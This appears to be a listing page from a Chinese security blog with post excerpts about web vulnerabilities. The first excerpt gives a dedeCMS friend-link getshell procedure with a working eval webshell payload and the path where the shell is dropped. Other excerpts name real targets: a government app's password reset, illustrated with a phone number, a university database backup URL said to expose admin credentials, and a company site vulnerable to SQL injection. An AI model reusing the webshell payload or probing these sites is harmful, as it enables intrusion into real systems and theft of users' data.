关于友情链接 做链接的朋友请进!!!

14
2017
01

dedeCMS友情链接getshell漏洞利用

把1.php上传到你的空间域名


站长审核后台友情连接  后生成一句话地址为http://hack1990.com//include/taglib/shell.lib.php


御剑字典添加/include/taglib/shell.lib.php测试是否存活即可


最后菜刀访问传参一句话http://hack1990.com//include/taglib/shell.lib.php?a=assert&b[0]=@eval($_POST[cmd]);

11
2016
05

wordpress WPImageEditorImagick 指令注入漏洞修复

 

在/wp-includes/media.php的_wp_image_editor_choose函数内部找到:


$implementations = apply_filters( 'wp_image_editors', array( 'WP_Image_Editor_Imagick' ,  'WP_Image_Editor_GD' ) );


<
18
2016
04

上海某政府服务APP任意重置密码可获取用户敏感信息

该APP可从APP store下载


拿朋友的号 18301733774 尝试    点击右下的忘记密码



10
2016
04

长春工业大学某站数据库备份外泄

http://nic.ccut.edu.cn/nic.sql 该处存在数据库备份泄露 


 数据库导出后可查看


可以看到管理员账号密码等等

<img s

10
2016
04

webpower官网sql注入漏洞,已入后台,数据库root权限

http://www.webpowerasia.com/m/con.php?id=11


通过sqlmap测试:


<legend style="margin: 0px 0px 0px 12px; p

14
2015
12

Discuz! 链接格子插件 v2.5.1 存储型 XSS 漏洞

本篇文章已加密,请输入密码后查看。